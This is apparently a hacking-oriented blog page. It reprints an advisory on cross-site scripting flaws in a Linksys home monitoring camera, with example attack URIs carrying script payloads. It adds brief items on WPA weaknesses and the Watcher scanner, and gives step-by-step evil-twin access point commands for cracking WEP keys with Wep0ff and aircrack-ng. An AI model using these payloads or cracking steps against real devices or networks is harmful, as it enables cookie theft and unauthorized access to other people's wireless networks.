Wireless hack,Wifi hack & security

Now Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is open for multiple XSS vulnerabilites as  it fails to sufficiently sanitize user-supplied data.

An Hacker may use  these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera firmware 1.00R22 and 1.00R24 are affected; other versions may also be vulnerable. so be carefull

The Exploit :-

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e
http://www.example.com/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
http://www.example.com/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

Ref -> GNUCITIZEN

Users have every right to be perplexed by wireless security standards. Faced by an alphabet soup of AES, RADIUS, WEP, WPA, TKIP, EAP, LEAP and 802.1x, many users don’t secure their wireless networks at all. Now that earlier wireless security standards such as Wi-Fi Protected Access and Wired Equivalent Privacy are being cracked, it’s time to examine what all the terms mean and think about changes.Just about a month ago, in early November, the news came out that the first cracks were appearing in WPA, or Wi-Fi Protected Access, a very popular wireless security standard. The compromise that was accomplished by some researchers was not a real killer, but the affected version of WPA (and the associated encryption process, TKIP, or Temporal Key Integrity Protocol), was always meant as a stopgap standard.

more

Good, there is another good tool for Pen testers called Watcher
Watcher is a run time passive-analysis tool for HTTP-based Web applications. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads, cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

>Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, and CSS
>Works seamlessly with complex Web 2.0 applications while you drive the Web browser
>Non-intrusive, will not raise alarms or damage production sites
>Real-time analysis and reporting – findings are reported as they’re found, exportable to XML
>Configurable domains with wildcard support
>Extensible framework for adding new checks
Download Watcher.zip

An another WEP key cracking tool, called WepOff,
Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients. It uses combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery. This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use:
1. Setup fake AP with KARMA tools or iwconfig
// ‘
iwpriv ath0 mode 2
iwconfig ath0 mode master essid foo enc 1122334455 channel 7
echo 1 > /proc/sys/dev/ath0/rawdev
echo 1 > /proc/sys/dev/ath0/rawdev_type
ifconfig ath0
up ifconfig ath0raw up
//’
2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key
Download Wep0ff